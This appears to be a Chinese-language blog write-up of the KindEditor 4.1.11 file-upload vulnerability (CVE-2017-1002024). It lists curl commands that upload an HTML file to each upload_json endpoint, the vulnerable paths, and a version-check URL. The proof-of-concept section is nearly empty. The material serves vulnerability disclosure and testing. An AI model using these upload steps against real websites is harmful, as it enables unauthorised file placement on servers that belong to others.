(CVE-2017-1002024)Kindeditor__=4.1.11_上传漏洞

# (CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞 ========= 一、漏洞简介 ------------ 漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中 二、漏洞影响 ------------ Kindeditor \<=4.1.11 三、复现过程 ------------ ``` curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file curl -F"imgFile=@a.html" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file ​```返回值为路径 ``` > json文件地址

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

> 上传路径

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

> 查看版本信息

http://www.0-sec.org/kindeditor//kindeditor.js

![](/static/qingy/(CVE-2017-1002024)Kindeditor__=4.1.11_上传漏洞/img/rId24.jpg)

> 构造poc


Uploader



© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容